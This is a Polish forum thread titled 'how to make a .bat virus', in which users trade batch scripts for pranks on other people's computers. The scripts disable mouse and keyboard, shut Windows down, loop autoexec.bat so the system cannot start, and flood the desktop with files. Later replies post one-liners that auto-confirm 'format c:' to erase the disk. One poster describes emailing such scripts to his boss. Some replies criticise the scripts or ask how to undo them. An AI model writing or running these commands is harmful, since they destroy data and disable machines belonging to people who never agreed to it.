Skocz do zawartości
Jedi_Master2

Jak zrobić wirusa *.bat

Rekomendowane odpowiedzi

@echo off

rundll32 mouse,disable - powoduje wyłącznie myszki

rundll32 keyboard,disable - wyłącza klawiaturę

rundll32 krnl386.exe,exitkernel - zamykanie windowsa

echo :petla>>c:\autoexec.bat -nie dopuszczanie do startu systemu

echo goto petla>>c:\autoexec.bat - ____||____

start http://www.gmclan.org/ -owieranie strony

game maker.exe -uruchamianie pliku (wybierz własną nazwę)

 

kod należy skopiować do notatnika i zapisać w formacie bat (lub exe)

uwaga! jest to stary przykład robienia wirusów i wątpliwe, że zadziała w windowsie xp

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

I po cholerę to tu dajesz? :/ Zresztą to nie wirus, tylko prosty program-żart.

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Nie lepiej zrobić wirusa który do autoexec.bat dopisuje kasowanie config.sys, albo w ogóle wirus kasujący config.sys xD ? To by był dopiero wirus, a nie taka zabawka ;p .

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
@echo off

rundll32 mouse,disable - powoduje wyłącznie myszki

rundll32 keyboard,disable - wyłącza klawiaturę

rundll32 krnl386.exe,exitkernel - zamykanie windowsa

echo :petla>>c:\autoexec.bat -nie dopuszczanie do startu systemu

echo goto petla>>c:\autoexec.bat - ____||____

start http://www.gmclan.org/ -owieranie strony

game maker.exe -uruchamianie pliku (wybierz własną nazwę)

 

kod należy skopiować do notatnika i zapisać w formacie bat (lub exe)

uwaga! jest to stary przykład robienia wirusów i wątpliwe, że zadziała w windowsie xp

 

Myślisz, że jak zapiszesz plik do exe to będzie działać ? O ile mi wiadomo to notatnik nie posiada kompilatora żadnego z języków.

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

wogóle dużo antywirusów ma odkrycie kodu bat,js ,vb itp.

Jak ktoś grał w emulatora pinbala to wie co to jest mieć 100 alertów...

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
Myślisz, że jak zapiszesz plik do exe to będzie działać ? O ile mi wiadomo to notatnik nie posiada kompilatora żadnego z języków.

Do *.bat i w wierszu poleceń.

 

Co do tematu to troche prymitywny wirus, już lepiej poszperać w *.ini i rejestrze.

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

to tutaj macie koda do leprzego

@echo off

rundll32 user,disableoemlayer

rundll32 mouse,disable

rundll32 keyboard,disable

rundll32 user,swapmousebutton

rundll32 krnl386.exe,FatalExit

rundll32 user,SetDoubleClickTime

echo dir /s /v c:\*.* >>c:autoexec.bat

copy %windir%\help\*.* c:\windows\pulpit\*.txt >nul

rundll32 krnl386.exe,exitkernel

echo :petla>>c:\autoexec.bat

echo goto petla>>c:\autoexec.bat

start http://www.gmclan.org

game maker.exe

echo. >%windir%\pulpit\Tank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpitTank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpit\Tank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpitTank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpit\Tank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpit\Tank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpit\Tank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpit\Tank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

echo. >%windir%\pulpit\Tank 3d.exe

echo. >%windir%\pulpit\c3c.jpg

echo. >%windir%\pulpit\hwdp.png

echo. >%windir%\pulpit\gm.ink

echo. >%windir%\pulpit\dark maximal XD.???

 

a jak chcecie to tu jest strona z trojanem (też nie najleprzym, przykładowym) http://www.angryziber.com/r3c/ Pozatym to wszystko ma być przykładowe!

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

To są chyba przykłady z jakiegoś tutoriala "jak pisać wirusy" albo coś podobnego, więc po co wycinasz po kawałku, zamiast dać całość?

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

A teraz pytanie - po co niszczyć komuś kompa wirusami? Nie umieta gier robić to teraz napluć do zupy niewinnemu, tak. Po za tym wszystkie antywirusy znają te sztuczki.

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

fajnie! tylko to jest po to, by wiedzieć jak taki wirus powstaje! jak ktoś wie od podstaw jak zrobić wirusa, to tym lepiej potem wie, jak sie przed nim zabezpieczyć :P . antywirus to nie wszystko.

 

PS. apropo nie umieta gier robić. Dlaczego wszyscy nie umieją gier robić? Czy to już jest zasada, że ja nic nie umiem i nic nie wiem i że trzeba ze mnie zrobić idiotę?

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
Czy to już jest zasada, że ja nic nie umiem i nic nie wiem i że trzeba ze mnie zrobić idiotę?

 

Tak (joke)

 

 

A tak na serio to po jakiego grzyba tutaj to dajesz ? Myślisz że jesteś "wielki" bo żeś napisał coś bessensownego w bat ? Chłopie weź se na wstrzymanie i publikuj coś co sie przydać można, a nie do destrukcji służy, bo jaki z tego pożytek ? Zerowy! Komu bedzie sie chciało otwierać pliki *.bat w edytorze textu zanim je uruchomi ?

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
fajnie! tylko to jest po to, by wiedzieć jak taki wirus powstaje! jak ktoś wie od podstaw jak zrobić wirusa, to tym lepiej potem wie, jak sie przed nim zabezpieczyć :P . antywirus to nie wszystko.
Kurcze, ile razy można powtarzać, że to co dajesz, to NIE JEST wirus komputerowy tylko złośliwy skrypt. Tu masz definicję wirusa:

http://pl.wikipedia.org/wiki/Wirus_komputerowy

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Wogóle wiesz co sie robi z programistami wirusów :]

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Mam pytanie a jak pozbyć sie takiego zrobionego wirusa np. który zablokuje ci klawiatur??:)

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Jedi_Master2 nie wiem czy wiesz ale ja wiem :jezor:

te "komendy" w tych skryptach używane były już za czasów systemów ms-dos!!!!

Wiem to bo mam ksiązke(a raczej miałem dokiedy sie niezgubiła) o ms-dos z 1992 roku i zniej sie uczyłem kiedyś też pisania takich programów (no podobnych) :]

Dobrze że kombinujesz i zmieniasz troche skrypty i rozumiesz ich znaczenie :thumbsup:

 

a czy zna ktoś program lub "emulattora" dos'a(ma czytac stare programi na dosa) przy właczonym xp

bo tak sie składa że napisałem prosty program a niemogo go otpalić(.bat) i sprawdzić czy działa :angry:

więc jak ktos moze to niech sprawdzi oto skrypt:

 

@Echo off

if %1X==X goto pomoc

if %1X==? goto pomoc

if %2X==X goto pomoc

if not exist %1 goto berr

FIND /V "%2" %1 > TEMP.$$$

COPY TEMP.$$$ %1

ERASE TEMP.$$$

goto koniec

REM ----------

:berr

Echo Plik nie istnieje!

goto koniec

REM ----------

:pomoc

Echo Składnia polecenia jest następująca:

Echo WYKRESL {plik} {ciąg znaków}

Echo

Echo Wszystkie wiersze zawierające podany ciąg znaków

Echo będą usunięte z pliku.

Rem ----------

:koniec

 

 

ps.lepiej nie pisać wirusów bo można zaoto siedzieć :P o ile fajniej pisać programy "żart" :P

a i jeszcze Jedi_Master2 wiesz moze jak sie robi takie pionowe kreski w notatniku ale nie chodzi o i (pionowa kreska tak jak I ale bez tych daszków u góry i nadole) ????

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
a czy zna ktoś program lub "emulattora" dos'a(ma czytac stare programi na dosa) przy właczonym xp

Dosbox

a i jeszcze Jedi_Master2 wiesz moze jak sie robi takie pionowe kreski w notatniku ale nie chodzi o i (pionowa kreska tak jak I ale bez tych daszków u góry i nadole) ????

Masz na myśli: "|" ? Przycisk z tym jest razem z backslash, a jak coś, to możesz poszukać w tablicy znaków Windowsa.

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Dzx a dosbox ma troche trudną obsługę ale sobie radze :D

jak na xp próbuje otworzyć ten twój "wirus" to mam napisane illegal coś tam

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

@up A co, myślałeś, że to legalne ?! =P

 

Chłeps, wdług mnie, to takie 'programiki' nie są tak szkodliwe, ażeby od razu tutaj je poniżać, ale są o tyle przydatne, by na przykład podrzucić takie cóś zuemu koledze, albo zdenerwować tatę (jak mi to kiedyś uczyniono xP). Sam czasem piszę takie złośliwe skrypty i podsyłam w mailach z raportami do szefa, a on się później przyczepia "A czemu to znowu mi wszystkie ikonki z pul[pitu znikły?!" xD Heh, no i oczywiście jak zawsze ja bohatersko ratuję mu później pulpit, kasując skrypt.

 

Oczywiście osobiście nie jestem za pisaniem takich wirusów, albo skryptów, ale jak najbardziej za nauką działania takich śmieci i uczenia się na własnej skórze i błędach, w każdym znaczeniu tych słów. xD

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

moim zdaniem to lepiej pisać takie "wirusy" w c++ lub pascalu bo tak to na xp Nieidzie ich odczytać (uruchomić) a moim zdaniem, niewiem jak waszym, "wirus" powinien być universalny!!!!!!!!!!!!

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
moim zdaniem to lepiej pisać takie "wirusy" w c++ lub pascalu bo tak to na xp Nieidzie ich odczytać

Taa, Pascal to stary crap którego już się nie używa ;)

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
Taa, Pascal to stary crap którego już się nie używa smile2.gif

Spier... xd

 

I tak, wirusy lepiej w assemblerze pisać ^^ .

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Lol, wpisz se format c: i masz wirusa... ludzie. :P Każdy kretyn może sobie coś takiego napisać i nazwać to "wirusem".

 

Btw. Niektórzy nie widzą różnicy między programem, a wirusem. Prosty przykład: odpaliłem sobie shutdown na 10s, podchodzi kumpel i mówi "złapałeś jakiegoś wirusa". xD

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

co do formata to go trzeba najpierw potwierdzić :D ale można napisąc prosto skrypt żeby zawsze odpowiedź brzmiała tak :D

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach
@echo off
format c: /q /x
t
y
cls
echo Cya! xD

Huh? o_O.

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

hehe :D nietrafiłeś :D tak to niedziała trzeba inaczej :P ale kombinuj dalej

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

A idziesz się założyć? ;] Rusz to pod DOSem.

 

W sumie na nowszych Windowsach też się da:

@echo off
echo t | format c:
cls
echo Cya! xD

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Pod dosem to nieuruchomne ba mam xp :P a przez emulatora niedziała ten przykład :P jak działa pod dosem to zwracam honory :P

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Działa, działa. Czasy kiedy klepało się pod DOSem dawno minęły - ale to tym jak się powinno pisać nie da rady zapomnieć :)

Udostępnij tego posta


Odnośnik do posta
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się tutaj.

Zaloguj się tutaj

  • Przeglądający   0 użytkowników

    Brak zarejestrowanych użytkowników, przeglądających tę stronę.

×